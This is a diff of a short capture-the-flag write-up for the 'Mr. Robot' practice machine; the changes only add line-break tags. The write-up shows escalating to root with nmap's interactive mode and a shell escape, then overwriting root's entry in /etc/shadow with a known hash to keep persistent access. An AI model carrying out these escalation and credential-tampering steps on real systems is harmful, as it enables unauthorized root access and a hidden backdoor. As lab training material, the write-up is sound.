0xt1m/ctf/Mr. Robot/report.md

 > https://gtfobins.github.io/ <br>
 > Useful site to find ways for privilege escalation.

-To escalate our privileges with nmap I do:
+To escalate our privileges with nmap I do:<br>
-`nmap --interactive`
+`nmap --interactive` <br>
 `!sh`

-Then modify the password of root in /etc/shadow to our known hash, so that you can easily access it again.
+Then modify the password of root in /etc/shadow to our known hash, so that you can easily access it again.<br>
-`nano /etc/shadow`
+`nano /etc/shadow`<br>
 `root:WVLY0mgH0RtUI:16753:0:99999:7:::`

 **Thank you for attention.**